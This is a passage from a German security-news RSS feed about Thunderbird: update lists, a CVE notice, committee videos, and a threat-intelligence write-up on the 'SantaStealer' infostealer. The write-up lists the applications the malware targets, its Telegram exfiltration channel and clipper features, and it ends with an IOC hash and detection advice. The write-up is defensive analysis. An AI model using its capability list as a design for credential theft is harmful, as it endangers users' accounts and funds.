<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, compat-openssl10, compat-openssl11, delve, expat, httpd:2.4, libexif, mod_http2, openssl, ruby4.0, samba, thunderbird, unbound, and vim), Debian (ceph and sudo), Fedora (libsoup3, pie, roundcubemail, and xorg-x11-server-Xwayland), Mageia ...]]></description>
<link>https://tsecurity.de/de/3572733/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572733/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 04 Jun 2026 15:23:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, compat-openssl10, compat-openssl11, delve, expat, httpd:2.4, libexif, mod_http2, openssl, ruby4.0, samba, thunderbird, unbound, and vim), <b>Debian</b> (ceph and sudo), <b>Fedora</b> (libsoup3, pie, roundcubemail, and xorg-x11-server-Xwayland), <b>Mageia</b> (lxc), <b>Oracle</b> (expat, gnutls, kernel, php:8.2, thunderbird, and uek-kernel), <b>Slackware</b> (httpd, net, proftpd, tigervnc, and xorg), <b>SUSE</b> (apache-sshd, apptainer, atril, bind, busybox, cloudflared, evolution-data-server, golang-github-prometheus-prometheus, golang-github-v2fly-v2ray-core, grafana, helm, kernel, libgphoto2-6, libjxl-devel, libsoup, libsoup-2_4-1, libsoup-3_0-0, memcached, ovmf, python-cairosvg, python-flask, python-pip, python-pymupdf, python-pyOpenSSL, python-urllib3, python-urllib3_1, python3-pyOpenSSL, restic, rsync, salt, sdbootutil, tor, tree-sitter, vorbis-tools, and yq), and <b>Ubuntu</b> (exim4, frr, gst-plugins-base1.0, libtemplate-perl, libwww-perl, mysql-8.0, nginx, python-pip, python-urllib3, and twisted).]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird für Android in Version 19.1 veröffentlicht]]></title>
<description><![CDATA[Das Team hinter dem mobilen Thunderbird für Android hat ein frisches Update auf die Version 19.1 veröffentlicht. Wer den E-Mail-Client auf seinem Smartphone nutzt, findet die neue Version bereits im GitHub-Repository oder zeitnah im Play Store. Die Entwickler konzentrieren sich...Zum Beitrag: Thu...]]></description>
<link>https://tsecurity.de/de/3571612/it-nachrichten/thunderbird-fuer-android-in-version-191-veroeffentlicht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571612/it-nachrichten/thunderbird-fuer-android-in-version-191-veroeffentlicht/</guid>
<pubDate>Thu, 04 Jun 2026 08:16:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Team hinter dem mobilen Thunderbird für Android hat ein frisches Update auf die Version 19.1 veröffentlicht. Wer den E-Mail-Client auf seinem Smartphone nutzt, findet die neue Version bereits im GitHub-Repository oder zeitnah im Play Store. Die Entwickler konzentrieren sich...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-fuer-android-in-version-19-1-veroeffentlicht/">Thunderbird für Android in Version 19.1 veröffentlicht</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-7324 | Mozilla Thunderbird up to 150.0.0 memory corruption (WID-SEC-2026-1296)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 150.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality. Executing a manipulation can lead to memory corruption.

This vulnerability is handled as CVE-2026-7324. The attack can be executed remotely. Ther...]]></description>
<link>https://tsecurity.de/de/3571451/sicherheitsluecken/cve-2026-7324-mozilla-thunderbird-up-to-15000-memory-corruption-wid-sec-2026-1296/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571451/sicherheitsluecken/cve-2026-7324-mozilla-thunderbird-up-to-15000-memory-corruption-wid-sec-2026-1296/</guid>
<pubDate>Thu, 04 Jun 2026 06:52:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 150.0.0</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is an unknown functionality. Executing a manipulation can lead to memory corruption.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-7324">CVE-2026-7324</a>. The attack can be executed remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3570811/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570811/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Wed, 03 Jun 2026 23:01:14 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Accessibility Committee: June 2026]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 0x - Views:0 The June Accessibility Committee meeting covered progress on automated testing (desktop), updates to the Thunderbird Accessibility Statement, and new community accessibility audits on Desktop Settings and Search. The group also discussed makin...]]></description>
<link>https://tsecurity.de/de/3567656/video/accessibility-committee-june-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567656/video/accessibility-committee-june-2026/</guid>
<pubDate>Tue, 02 Jun 2026 23:24:17 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/l_F5QJ0xEsM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The June Accessibility Committee meeting covered progress on automated testing (desktop), updates to the Thunderbird Accessibility Statement, and new community accessibility audits on Desktop Settings and Search. The group also discussed making gesture and keyboard navigation accessible across devices, improving developer guidance and QA testing, and noted that Thunderbird Add-ons site modernization is tentatively planned for the 2027 services roadmap.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3564272/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3564272/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Mon, 01 Jun 2026 22:31:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 9.0, firefox, flatpak, httpd, and thunderbird), Debian (chromium, corosync, cyborg, dovecot, exim4, git-lfs, imagemagick, kernel, keystone, linux-6.1, php-twig, python-aiohttp, sentry-python, swift, and symfony), Fedora (chromium, dj...]]></description>
<link>https://tsecurity.de/de/3563159/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563159/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 01 Jun 2026 15:09:32 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 9.0, firefox, flatpak, httpd, and thunderbird), <b>Debian</b> (chromium, corosync, cyborg, dovecot, exim4, git-lfs, imagemagick, kernel, keystone, linux-6.1, php-twig, python-aiohttp, sentry-python, swift, and symfony), <b>Fedora</b> (chromium, djvulibre, docker-compose, giflib, haveged, libsoup3, libssh2, mingw-objfw, netatalk, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, objfw, pdns, perl-Crypt-PasswdMD5, perl-libwww-perl, python-urllib3, suricata, and xrdp), <b>Mageia</b> (perl-Template-Toolkit and vim), <b>Oracle</b> (.NET 8.0, cockpit, firefox, flatpak, freerdp, kernel, and libexif), <b>Red Hat</b> (containernetworking-plugins, libsoup, libsoup3, multiple packages, php:8.2, php:8.3, podman, rhc, and skopeo), <b>SUSE</b> (amazon-ecs-init, amazon-ssm-agent, apptainer, azure-storage-azcopy, bind, chromium, csync2, cups, docker-stable, frr, gdk-pixbuf-loader-libheif, gnutls, hauler, helm, helm3, ignition, java-1_8_0-ibm, kernel, libBasicUsageEnvironment2, libredwg-devel, localsearch, memcached, openexr, perl-Net-CIDR-Lite, perl-YAML-Syck, postgresql14, python-mistune, python-pillow, python-pytest-html, python-urllib3, python311-Authlib, strongswan, trivy, vim, and xz), and <b>Ubuntu</b> (gdal, python-pip, qtwebengine-opensource-src, rsync, and texmaker).]]></content:encoded>
</item>
<item>
<title><![CDATA[Rocky Linux 10.2: What Is New for Enterprise Linux (2026)]]></title>
<description><![CDATA[Rocky Linux 10.2 arrived May 28 with post-quantum cryptography enabled by default. I walk through ML-KEM hybrid key exchange in OpenSSH, the Flatpak-first delivery for Firefox and Thunderbird, Podman switch to Sequoia-PGP, the FUTURE crypto policy warning, and the full developer toolchain refresh.]]></description>
<link>https://tsecurity.de/de/3561727/linux-tipps/rocky-linux-102-what-is-new-for-enterprise-linux-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561727/linux-tipps/rocky-linux-102-what-is-new-for-enterprise-linux-2026/</guid>
<pubDate>Mon, 01 Jun 2026 05:07:02 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Rocky Linux 10.2 arrived May 28 with post-quantum cryptography enabled by default. I walk through ML-KEM hybrid key exchange in OpenSSH, the Flatpak-first delivery for Firefox and Thunderbird, Podman switch to Sequoia-PGP, the FUTURE crypto policy warning, and the full developer toolchain refresh.]]></content:encoded>
</item>
<item>
<title><![CDATA[SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and…]]></title>
<description><![CDATA[SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and Session CookiesThreat actors leverage SantaStealer for stealer logs generation, account takeover campaigns, crypto theft, and large-scale data breach operations across darkweb ecosystemsWhat is SantaSteal...]]></description>
<link>https://tsecurity.de/de/3559918/hacking/santastealer-emerges-as-advanced-maas-infostealer-targeting-credentials-crypto-wallets-and/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559918/hacking/santastealer-emerges-as-advanced-maas-infostealer-targeting-credentials-crypto-wallets-and/</guid>
<pubDate>Sun, 31 May 2026 03:04:43 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and Session Cookies</h3><blockquote>Threat actors leverage SantaStealer for stealer logs generation, account takeover campaigns, crypto theft, and large-scale data breach operations across darkweb ecosystems</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_8qX4W9yEzYZFMhdW2wKzQ.jpeg"></figure><h4>What is SantaStealer?</h4><p>SantaStealer, a newly identified Malware-as-a-Service (MaaS) infostealer, is being actively marketed within cybercriminal communities as a modular credential theft platform capable of harvesting browser credentials, session cookies, crypto wallet data, VPN configurations, FTP credentials, gaming accounts, and email client sessions. The malware also integrates a cryptocurrency clipper capable of silently hijacking copied wallet addresses during transactions, enabling direct crypto theft even when credential harvesting operations yield limited results. Researchers from TW360 Threat Intelligence assess SantaStealer as part of the growing industrialization of the infostealer ecosystem, where threat actors monetize stolen credentials, stealer logs, authentication cookies, and financial data through darkweb marketplaces, Telegram channels, and initial access broker networks.</p><h3>SantaStealer Login Portal and Affiliate Access</h3><p>The operation exposes a branded affiliate-facing login panel designed for controlled onboarding and malware distribution management. Unlike open-access commodity malware services, SantaStealer appears to rely on account-key provisioning rather than self-registration, indicating a more curated affiliate model commonly observed among mature cybercrime operations. The onboarding workflow reflects a commercially structured Malware-as-a-Service infrastructure focused on scalability, affiliate management, and operational control. The branding, clean interface, and simplified access process further demonstrate how modern cybercriminal operations increasingly mirror legitimate SaaS business models.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*I4uEKs0F94DhbpJ3LqPnVg.png"><figcaption><em>Figure 1 — SantaStealer login and affiliate access portal.</em></figcaption></figure><h3>Modular Stealer Builder Enables Targeted Data Theft</h3><p>Once authenticated, affiliates gain access to the SantaStealer build configuration dashboard, where individual modules can be selectively enabled or disabled depending on operational requirements. The malware builder supports harvesting browser credentials, saved passwords, session cookies, crypto wallet files, FTP credentials, VPN configurations, gaming sessions, and email client data. Observed application targets include FileZilla, Atomic Wallet, Electrum Wallet, Cake Wallet, Ledger Live, Steam, Microsoft Outlook, Thunderbird, and WinSCP, indicating that the malware is specifically engineered to target both consumer and enterprise authentication artifacts.</p><p>The panel explicitly references %APPDATA% and %LOCALAPPDATA% paths used for credential extraction and session harvesting. Additional functionality exposed in the builder includes Telegram Bot API exfiltration, fake error popup generation, configurable execution delays, campaign watermarking, and custom application path targeting. The “Application Data Collector” module appears specifically designed to aggregate authentication artifacts across browsers, VPN clients, FTP software, gaming platforms, and cryptocurrency applications within a single execution cycle, increasing the likelihood of successful account takeover and credential abuse operations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1zF2ZDmIX6gtRcRjVZtzuw.png"><figcaption><em>Figure 2 — SantaStealer configuration dashboard exposing targeted applications, Telegram exfiltration, and modular credential harvesting.</em></figcaption></figure><h3>Crypto Clipper Targets Cryptocurrency Transactions</h3><p>SantaStealer also includes a separately compiled cryptocurrency clipper module designed for wallet hijacking and transaction interception. The clipper continuously monitors clipboard activity and automatically replaces copied cryptocurrency wallet addresses with attacker-controlled alternatives before transactions are completed. Supported blockchain ecosystems include Bitcoin, Ethereum, Monero, Litecoin, Solana, Ripple, Dogecoin, and TRON, demonstrating broad targeting across mainstream cryptocurrency networks.</p><p>Researchers observed that the clipper module is encrypted independently before being bundled into the final payload through the loader and dropper functionality. Notably, panel documentation indicates that if affiliates fail to configure replacement wallet addresses, default operator-controlled wallets may automatically be used instead. This mechanism potentially creates an additional passive monetization stream for the malware operators themselves, allowing them to profit even from poorly configured affiliate campaigns.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*z5BXcBIyV9vOWwboyB80ig.png"><figcaption><em>Figure 3 — SantaStealer crypto clipper configuration panel supporting multiple cryptocurrency ecosystems.</em></figcaption></figure><h3>Feature Matrix Reveals Technical Capabilities</h3><p>The SantaStealer feature comparison panel provides additional insight into the malware’s technical capabilities and operational design. The operator advertises fully silent execution, no visible console windows, minimal CPU usage, Windows 7, 10, and 11 compatibility, heuristic file discovery, crypto keyword scanning, modular architecture across 14 modules, and optional CIS region blocking functionality. The malware claims asynchronous data collection completing within approximately five seconds of execution, producing uncompressed stealer logs ranging between 1 MB and 10 MB.</p><p>The optional CIS filtering functionality is particularly notable because it mirrors operational security patterns frequently associated with Russian-speaking cybercriminal groups attempting to avoid regional law enforcement attention. Premium and Lifetime subscription tiers additionally unlock heuristic crypto-related file targeting and recursive file discovery functionality, significantly increasing the malware’s ability to identify sensitive financial and authentication-related data across infected systems.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G_jtAkkzme0l_M224xtfmA.png"><figcaption><em>Figure 4 — SantaStealer feature matrix highlighting stealth execution, modularity, CIS filtering, and asynchronous data collection capabilities.</em></figcaption></figure><h3>Subscription Pricing and Criminal Monetization</h3><p>SantaStealer is monetized using a tiered subscription structure that closely resembles legitimate commercial software licensing models. The Basic plan is priced at $200 per month, while the Premium plan costs $300 per month and unlocks additional functionality including heuristic scanning, expanded targeting capabilities, and cryptocurrency clipper support. A Lifetime plan is also advertised for a one-time payment of $1,000, positioning the malware as a long-term operational investment for threat actors conducting persistent credential theft and financial fraud campaigns.</p><p>Researchers assess that SantaStealer operators likely generate revenue through two separate monetization channels simultaneously. The first comes from affiliate subscription payments, while the second likely originates from passive cryptocurrency theft through clipper misconfigurations where default operator wallet addresses remain active. This architecture incentivizes widespread deployment regardless of affiliate sophistication and reflects the broader commercialization trend currently dominating the Malware-as-a-Service ecosystem.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Dyx4wmA0MmUT3zzMJylLOA.png"><figcaption><em>Figure 5 — SantaStealer subscription pricing structure and feature segmentation.</em></figcaption></figure><h3>Threat Intelligence Assessment</h3><p>SantaStealer represents a growing category of advanced infostealers engineered for scalable credential theft, session hijacking, account takeover, and financial fraud operations. The malware’s combination of browser credential theft, session cookie harvesting, Telegram-based exfiltration, crypto wallet extraction, clipboard hijacking, modular payload generation, and stealer log creation positions it as a significant threat for organizations facing phishing campaigns, ransomware intrusions, business email compromise (BEC), and darkweb credential exposure.</p><p>The increasing availability of MaaS infostealers significantly lowers the barrier to entry for cybercriminal affiliates, enabling even low-skilled threat actors to conduct sophisticated credential theft and data breach operations at scale. The commercialization of stealer malware also increases the availability of stolen authentication artifacts across darkweb ecosystems, directly contributing to credential stuffing attacks, enterprise account takeover incidents, and unauthorized access operations targeting both individuals and organizations.</p><h3>Indicators of Compromise (IOCs)</h3><pre>SHA-256:<br>055d777c3d38269f07d454f07abc985dfa52493b669cd3cc687304a0a6425122<br><br>Infrastructure:<br>Telegram Bot API: Operator-Controlled C2 Panel<br><br>VirusTotal: https://www.virustotal.com/gui/file/055d777c3d38269f07d454f07abc985dfa52493b669cd3cc687304a0a6425122<br></pre><h3>Detection and Mitigation Recommendations</h3><p>Organizations should immediately block the identified SHA-256 hash across endpoints, email gateways, proxies, and SIEM platforms. SOC teams should monitor for suspicious connections to api.telegram.org, unusual clipboard activity, and unauthorized access to browser credential stores, VPN configurations, FTP clients, email applications, and crypto wallet files.</p><p>Since SantaStealer steals passwords, session cookies, and authentication data, exposed credentials should be reset immediately and all active sessions should be revoked to prevent account takeover. Organizations should also enforce phishing-resistant MFA such as FIDO2 or WebAuthn security keys, as stolen session cookies can bypass traditional MFA protections.</p><p>Infostealer malware like SantaStealer often leads to stolen credentials and stealer logs being sold on darkweb forums and Telegram channels, increasing the risk of ransomware, account takeover, and data breach incidents.</p><p>ThreatWatch360’s <a href="https://threatwatch360.com/solution/breacheye">BreachEye Darkweb Monitoring Platform</a> helps CISO, SOC, and IT teams identify exposed employee credentials, stealer log infections, leaked corporate accounts, and darkweb data breach activity in real time.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=2b8d9707d985" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/santastealer-emerges-as-advanced-maas-infostealer-targeting-credentials-crypto-wallets-and-2b8d9707d985">SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 8.0, .NET 9.0, cockpit, firefox, flatpak, httpd, kernel, and kernel-rt), Debian (kernel, kitty, lemonldap-ng, nagios4, python-flask-httpauth, and roundcube), Fedora (CImg, gmic, haveged, jpegxl, kernel, libpng, mapserver, mingw-qt6-qtsvg, openb...]]></description>
<link>https://tsecurity.de/de/3557942/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557942/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Sat, 30 May 2026 01:19:25 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 8.0, .NET 9.0, cockpit, firefox, flatpak, httpd, kernel, and kernel-rt), <b>Debian</b> (kernel, kitty, lemonldap-ng, nagios4, python-flask-httpauth, and roundcube), <b>Fedora</b> (CImg, gmic, haveged, jpegxl, kernel, libpng, mapserver, mingw-qt6-qtsvg, openbao, perl-Sereal, perl-Sereal-Decoder, perl-Sereal-Encoder, and podofo), <b>Mageia</b> (bind, graphicsmagick, microcode, nginx, packages, perl-Catalyst-Plugin-Authentication, perl-HTTP-Daemon, perl-IO-Compress, and thunderbird(-l10n)), <b>SUSE</b> (alloy, apache2, beets, bubblewrap, cups, docker-stable, ffmpeg-4, ffmpeg-7, firefox, google-osconfig-agent, patterns-glibc-hwcaps, podman, samba, thunderbird, trivy, xdg-desktop-portal, and xz), and <b>Ubuntu</b> (apache2, libreoffice, multipart, openjdk-17, openjdk-17-crac, openjdk-21, openjdk-21-crac, openjdk-25, openjdk-25-crac, openjdk-26, openjdk-8, openjdk-lts, php8.1, php8.3, php8.4, php8.5, pyopenssl, python-pip, qtsvg-opensource-src, sed, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox, gdk-pixbuf2, glibc, gnutls, kernel, libexif, mysql8.4, postgresql16, postgresql18, python3.14, ruby:3.3, and ruby:4.0), Debian (krb5, roundcube, starlette, unbound, and varnish), Fedora (kernel, nginx, nginx-mod-brotli, nginx-mod-fancyindex...]]></description>
<link>https://tsecurity.de/de/3554256/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554256/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 28 May 2026 15:09:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox, gdk-pixbuf2, glibc, gnutls, kernel, libexif, mysql8.4, postgresql16, postgresql18, python3.14, ruby:3.3, and ruby:4.0), <b>Debian</b> (krb5, roundcube, starlette, unbound, and varnish), <b>Fedora</b> (kernel, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, perl-Imager, poppler, python-uv-build, rrdtool, rust-astral-tokio-tar, rust-astral_async_http_range_reader, rust-astral_async_zip, uv, and xen), <b>Oracle</b> (.NET 10.0, .NET 9.0, glibc, ruby:3.3, and thunderbird), <b>Red Hat</b> (.NET 10.0, .NET 8.0, .NET 9.0, containernetworking-plugins, gvisor-tap-vsock, podman, runc, and skopeo), <b>SUSE</b> (agama, alloy, bubblewrap, cockpit, cups, dnsmasq, emacs, glibc, gnutls, go1.25, go1.25-openssl, go1.26, go1.26-openssl, google-guest-agent, hplip, ibus-rime, librime, kernel, libarchive, libzypp, nginx, openexr, openssh, php7, postgresql14, postgresql15, postgresql16, python311-pytest-html, redis, redis7, rsync, tree-sitter, valkey, xen, and yq), and <b>Ubuntu</b> (cableswig, commons-beanutils, dnsmasq, ffmpeg, foomuuri, gst-plugins-good1.0, libcaca, libgcrypt20, mediawiki, memcached, papers, postorius, tgt, and tika).]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla schließt Speicherfehler: Update für Thunderbird & Firefox - Security-Insider]]></title>
<description><![CDATA[Speicherbeschädigungen bei Mozilla ermöglichen die Ausführung bösartigen Codes in Thunderbird und Firefox. (Bild: Dall-E / Vogel IT-Medien GmbH / KI- ...]]></description>
<link>https://tsecurity.de/de/3553435/it-security-nachrichten/mozilla-schliesst-speicherfehler-update-fuer-thunderbird-firefox-security-insider/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3553435/it-security-nachrichten/mozilla-schliesst-speicherfehler-update-fuer-thunderbird-firefox-security-insider/</guid>
<pubDate>Thu, 28 May 2026 10:38:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Speicherbeschädigungen bei Mozilla ermöglichen die Ausführung bösartigen Codes in Thunderbird und Firefox. (Bild: Dall-E / Vogel <b>IT</b>-Medien GmbH / KI- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Memory Bugs in Mozilla Thunderbird]]></title>
<description><![CDATA[Mozilla schließt drei Speicherfehler in Thunderbird, die auch Firefox betreffen. Die Sicherheitslücken könnten zur Ausführung von Schadcode führen, die Einstufung des Risikos ist nicht einheitlich. Updates auf Thunderbird 151 und Firefox 151 werden empfohlen.]]></description>
<link>https://tsecurity.de/de/3553045/it-security-nachrichten/memory-bugs-in-mozilla-thunderbird/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3553045/it-security-nachrichten/memory-bugs-in-mozilla-thunderbird/</guid>
<pubDate>Thu, 28 May 2026 07:22:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mozilla schließt drei Speicherfehler in Thunderbird, die auch Firefox betreffen. Die Sicherheitslücken könnten zur Ausführung von Schadcode führen, die Einstufung des Risikos ist nicht einheitlich. Updates auf Thunderbird 151 und Firefox 151 werden empfohlen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3552469/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552469/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Wed, 27 May 2026 23:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Design System Governance Committee: April 2026]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 0x - Views:0 In April, the Design System committee continued work on tokens, JSON export, documentation, accessibility guidance, and public release planning, while also discussing changelog structure, versioning, Bolt identity ideas, and ways to grow the c...]]></description>
<link>https://tsecurity.de/de/3552237/video/design-system-governance-committee-april-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552237/video/design-system-governance-committee-april-2026/</guid>
<pubDate>Wed, 27 May 2026 21:08:31 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/2kuFYzPa4nU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In April, the Design System committee continued work on tokens, JSON export, documentation, accessibility guidance, and public release planning, while also discussing changelog structure, versioning, Bolt identity ideas, and ways to grow the community. There is an open seat for a community member. If you are interested send a msg in our matrix channel: Bolt Design System: https://matrix.to/#/#bolt-design-system:mozilla.org<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Design System Governance Committee: March 2026]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 0x - Views:3 This month, the committee shares updates on accent colours in desktop, design system process, documentation, and how we might handle public releases and versioning. A few items are still moving slowly because of other priorities, but there is ...]]></description>
<link>https://tsecurity.de/de/3552211/video/design-system-governance-committee-march-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552211/video/design-system-governance-committee-march-2026/</guid>
<pubDate>Wed, 27 May 2026 20:54:16 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/bqXVtxOXDEA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This month, the committee shares updates on accent colours in desktop, design system process, documentation, and how we might handle public releases and versioning. A few items are still moving slowly because of other priorities, but there is progress in areas like governance research and planning next steps.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Accessibility Committee: March 2026]]></title>
